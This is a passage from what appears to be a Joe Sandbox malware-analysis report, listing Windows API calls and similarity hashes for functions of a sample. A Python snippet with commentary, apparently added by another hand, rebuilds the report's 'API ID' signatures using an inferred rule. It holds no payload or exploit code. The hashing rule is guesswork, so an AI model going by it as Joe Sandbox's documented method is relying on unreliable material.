                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3321077145-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 7cd5f2a63614e36a101d3a24e32b13d83311d412b7f68151a30e37c1c693f1dc
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 240381fd0e223f31e6bb83dc4f900fe278965bce5f9bbaa9f824fb1079ab41c9
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7cd5f2a63614e36a101d3a24e32b13d83311d412b7f68151a30e37c1c693f1dc
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 393180B5900301ABCB10AF71C985A1BF7E8AF84755F10891EF85497392C739FC45CB68
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • GetParent.USER32(?), ref: 004505BF
                                                                                                                                                                                                                                                                                                                                                                                                                • DefDlgProcW.USER32(?,00000138,?,?,004A83D8,?,004A83D8,?), ref: 00450610
                                                                                                                                                                                                                                                                                                                                                                                                                • DefDlgProcW.USER32(?,00000133,?,?,004A83D8,?,004A83D8,?), ref: 0045065A
                                                                                                                                                                                                                                                                                                                                                                                                                • DefDlgProcW.USER32(?,00000134,?,?,004A83D8,?,004A83D8,?), ref: 00450688
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Proc$Parent
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2351499541-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 93bb19dea30658450b5dada9832e261aba4ffbe4fc891123e7e77a8d6405a749
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: e3e31f905615dd8bfbe674c7a91f48f64006a8638b4dc9b760805e547d05c650
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 93bb19dea30658450b5dada9832e261aba4ffbe4fc891123e7e77a8d6405a749
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8C3128362411006BC2209B299C58DBB7B58EBC7336F14465BFA54832D3CB769826C768
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00438C85: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00438C95
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,0000102C,00000000,00000002), ref: 00461420
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,0000102C,00000000,00000002), ref: 0046144F
                                                                                                                                                                                                                                                                                                                                                                                                                • __itow.LIBCMT ref: 00461461
                                                                                                                                                                                                                                                                                                                                                                                                                • __itow.LIBCMT ref: 004614AB
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageSend$__itow$_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2875217250-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 347b44770508ca88cf5981266e998b528a2978f718c0dd2978777487f2c1d3f7
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: b65c482f8247f617b799fd724a7506577ebf884cdb52d0d4602b18db992df379
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 347b44770508ca88cf5981266e998b528a2978f718c0dd2978777487f2c1d3f7
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3A213D7670031067D210BA169C86FAFB794EB94714F08443FFF44AB241EE69E94687EB
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • GetForegroundWindow.USER32 ref: 00472806
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00443EEF: GetWindowThreadProcessId.USER32(00000001,00000000), ref: 00443F11
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00443EEF: GetCurrentThreadId.KERNEL32 ref: 00443F18
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00443EEF: AttachThreadInput.USER32(00000000), ref: 00443F1F
                                                                                                                                                                                                                                                                                                                                                                                                                • GetCaretPos.USER32(?), ref: 0047281A
                                                                                                                                                                                                                                                                                                                                                                                                                • ClientToScreen.USER32(00000000,?), ref: 00472856
                                                                                                                                                                                                                                                                                                                                                                                                                • GetForegroundWindow.USER32 ref: 0047285C
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2759813231-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: f08c9821fa495b0e17bd1c697e1e5286648ea95901ecf1a9ceb1535147bec3ee
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 38f02bd9b1f6bed34cfa7ce2d7f69328ba3456287a0ba45db7850a86b8391dd2
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f08c9821fa495b0e17bd1c697e1e5286648ea95901ecf1a9ceb1535147bec3ee
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FF2195716403056FE310EF65CC42F5BB7E8AF84708F144D2EF544AB282D6FAB9858795
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0046DD22: IsWindow.USER32(00000000), ref: 0046DD51
                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 0047728E
                                                                                                                                                                                                                                                                                                                                                                                                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 004772A9
                                                                                                                                                                                                                                                                                                                                                                                                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 004772C0
                                                                                                                                                                                                                                                                                                                                                                                                                • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001,?,?), ref: 004772D0
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Window$Long$AttributesLayered
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2169480361-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: cf64f2ba38e7b8586118add57273b6dbf74680437e58013ae8f64db123384f26
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: faea1ea985e506ac999786301d765d91882fdca708237d94abe4bce3661c65f1
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cf64f2ba38e7b8586118add57273b6dbf74680437e58013ae8f64db123384f26
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5F11B431205510ABD310FB29DD45F9BB798FF91720F10862EF455E72E2C7A8AC45C7A8
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32 ref: 00448CB8
                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 00448CE0
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448D19
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D62
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: MessageSend$LongWindow
• String ID:
• API String ID: 312131281-0
APIs
• select.WSOCK32 ref: 0045890A
• __WSAFDIsSet.WSOCK32(00000000,00000000), ref: 00458919
• accept.WSOCK32(00000000,00000000,00000000,00000000,00000000), ref: 00458927
• WSAGetLastError.WSOCK32(00000000), ref: 00458952
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: ErrorLastacceptselect
• String ID:
• API String ID: 385091864-0
APIs
• SendMessageW.USER32(?,000000B0,?,?), ref: 00438D6F
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 00438D82
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 00438D9A
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 00438DB4
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
APIs
• CreateWindowExW.USER32(?,?,?,FFFFFFFF,?,?,?,?,?,?,00400000,00000000), ref: 0043367E
• GetStockObject.GDI32(00000011), ref: 00433695
• SendMessageW.USER32(00000000,00000030,00000000), ref: 0043369F
• ShowWindow.USER32(00000000,00000000), ref: 004336BA
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: Window$CreateMessageObjectSendShowStock
• String ID:
• API String ID: 1358664141-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: a78582cd8c915fd270119012ff4eddf0033f410814d91724adacf9cac7d73a6b
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 5bb77caae3378c1c36de35f78993aeb7f53e4fc0e9047450929301c31466c70f
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a78582cd8c915fd270119012ff4eddf0033f410814d91724adacf9cac7d73a6b
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 60114F72204A00BFD254DF55CC49F5BB3F9AFCCB01F20950DB254922A0D7B4E9418BA9
APIs
• GetCurrentThreadId.KERNEL32 ref: 004441B8
• MessageBoxW.USER32(?,?,?,?), ref: 004441F6
• WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0044420C
• CloseHandle.KERNEL32(00000000), ref: 00444213
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: CloseCurrentHandleMessageObjectSingleThreadWait
• String ID:
• API String ID: 2880819207-0
• Opcode ID: 146d2f4ba151d14deb3aa3acfdd6de045567f86e28c98b22242e1e1489ea4094
• Instruction ID: a177bb78e812b0c83f085b16f259857c8a511f23e32e5024349264f8b0df3d09
• Opcode Fuzzy Hash: 146d2f4ba151d14deb3aa3acfdd6de045567f86e28c98b22242e1e1489ea4094
• Instruction Fuzzy Hash: C401E5364183105BD300DB28ED08A9BBBD8BFD9721F18067EF89893351E6B48948C7B6
APIs
• GetWindowRect.USER32(?,?), ref: 00434037
• ScreenToClient.USER32(?,?), ref: 0043405B
• ScreenToClient.USER32(?,?), ref: 00434085
• InvalidateRect.USER32(?,?,?), ref: 004340A4
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: ClientRectScreen$InvalidateWindow
• String ID:
• API String ID: 357397906-0
• Opcode ID: 751e48bbdad3fa965b56aea51b9fa4e55de6b4169d4940aca7a3583b508516de
• Instruction ID: 02545dd0d615a745195cb6f618e51c1f9c2552a202a2369b8695847d2ce6fb2f
• Opcode Fuzzy Hash: 751e48bbdad3fa965b56aea51b9fa4e55de6b4169d4940aca7a3583b508516de
• Instruction Fuzzy Hash: 24117EB9608302AFC304DF18D98095BBBE9FFD8650F10891EF88993350D770E9498BA2
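The "API ID" in each Similarity block is a token signature derived from the function's APIs list, which lets you compare functions across reports without relying on addresses. The following Python is an added example, not Joe Sandbox code or output: it parses the APIs bullet lines exactly as they appear in this report (the GetCurrentThreadId/MessageBoxW entry, the GetWindowRect/ScreenToClient entry, and the __wsplitpath/__wcsicoll entry that follows) and rebuilds their API IDs. The rule it implements is inferred from these entries and is an assumption, not a documented algorithm: CamelCase names are split into words, tokens shorter than four characters (Get, To, For, Box, W, Id) are dropped, tokens are grouped by descending occurrence count, sorted alphabetically within a group, and the groups joined with "$". The numeric "API String ID" is a hash and is not reproduced.

```python
import re
from collections import Counter

# Constructed input: the "APIs" lists of three function entries in this
# report, copied verbatim (module suffix, arguments and ref address
# included). Nothing else here is Joe Sandbox code or output.
ENTRY_MSGBOX = """
• GetCurrentThreadId.KERNEL32 ref: 004441B8
• MessageBoxW.USER32(?,?,?,?), ref: 004441F6
• WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0044420C
• CloseHandle.KERNEL32(00000000), ref: 00444213
"""
ENTRY_RECT = """
• GetWindowRect.USER32(?,?), ref: 00434037
• ScreenToClient.USER32(?,?), ref: 0043405B
• ScreenToClient.USER32(?,?), ref: 00434085
• InvalidateRect.USER32(?,?,?), ref: 004340A4
"""
ENTRY_SPLITPATH = """
• __wsplitpath.LIBCMT ref: 00436A45
  • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
• __wsplitpath.LIBCMT ref: 00436A6C
• __wcsicoll.LIBCMT ref: 00436A93
• __wcsicoll.LIBCMT ref: 00436AB0
"""

# One "• Name.MODULE(args), ref: ADDR" line, optionally prefixed with the
# "Part of subcall function XXXX:" marker the report uses for callees.
API_LINE_RE = re.compile(
    r"•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9]+)"
    r".*?ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

# Split CamelCase Win32 names into words; all-lowercase CRT names such as
# __wsplitpath_helper stay as a single token.
TOKEN_RE = re.compile(r"[A-Z]+[a-z0-9]*|[a-z_][a-z0-9_]*")

# Assumption inferred from the entries on this page: tokens shorter than
# four characters (Get, To, For, Box, W, Id) do not appear in the API ID.
MIN_TOKEN_LEN = 4


def parse_api_lines(text):
    """Return [(api_name, module, ref_address)] for every APIs bullet line."""
    calls = []
    for line in text.splitlines():
        m = API_LINE_RE.search(line)
        if m:
            calls.append((m["name"], m["module"], m["ref"]))
    return calls


def tokenize(api_name):
    return [t for t in TOKEN_RE.findall(api_name) if len(t) >= MIN_TOKEN_LEN]


def api_id(api_names):
    """Token signature: tokens grouped by descending occurrence count, sorted
    alphabetically inside each group, groups joined with '$'. This grouping
    rule is inferred from the page, not documented by Joe Sandbox."""
    counts = Counter(tok for name in api_names for tok in tokenize(name))
    by_count = {}
    for tok, n in counts.items():
        by_count.setdefault(n, []).append(tok)
    return "$".join("".join(sorted(by_count[n])) for n in sorted(by_count, reverse=True))


def api_id_from_report(text):
    return api_id([name for name, _module, _ref in parse_api_lines(text)])


if __name__ == "__main__":
    for label, entry in (("msgbox", ENTRY_MSGBOX), ("rect", ENTRY_RECT), ("splitpath", ENTRY_SPLITPATH)):
        print(label, api_id_from_report(entry))
```

Running the script prints the three API IDs shown in the Similarity blocks. Because the signature ignores call addresses and argument values, two functions with the same API ID in different reports are candidates for the same library or packer stub even when their Opcode IDs differ; the fuzzy hashes in the same block are what you compare next to confirm.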
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • __wsplitpath.LIBCMT ref: 00436A45
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                                                                                                                                                                                                                                                                                                                                                                • __wsplitpath.LIBCMT ref: 00436A6C
                                                                                                                                                                                                                                                                                                                                                                                                                • __wcsicoll.LIBCMT ref: 00436A93
                                                                                                                                                                                                                                                                                                                                                                                                                • __wcsicoll.LIBCMT ref: 00436AB0
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
• String ID:
• API String ID: 1187119602-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: _wcslen$_malloc_wcscat_wcscpy
• String ID:
• API String ID: 1597257046-0
APIs
• DeleteObject.GDI32(?), ref: 0045564E
• DeleteObject.GDI32(?), ref: 0045565C
• DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
• DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: DeleteDestroyObject$IconWindow
• String ID:
• API String ID: 3349847261-0
APIs
• EnterCriticalSection.KERNEL32(?), ref: 0044B60B
• InterlockedExchange.KERNEL32(?,?), ref: 0044B619
• LeaveCriticalSection.KERNEL32(?), ref: 0044B630
• LeaveCriticalSection.KERNEL32(?), ref: 0044B641
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: CriticalSection$Leave$EnterExchangeInterlocked
• String ID:
• API String ID: 2223660684-0
APIs
  • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
  • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
  • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
  • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
  • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                                                                                                                                                                                                                                                                                                                                                                • MoveToEx.GDI32(?,?,00000000,00000000), ref: 0044728F
                                                                                                                                                                                                                                                                                                                                                                                                                • LineTo.GDI32(?,00000000,00000002), ref: 004472A0
                                                                                                                                                                                                                                                                                                                                                                                                                • EndPath.GDI32(?), ref: 004472B0
                                                                                                                                                                                                                                                                                                                                                                                                                • StrokePath.GDI32(?), ref: 004472BE
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
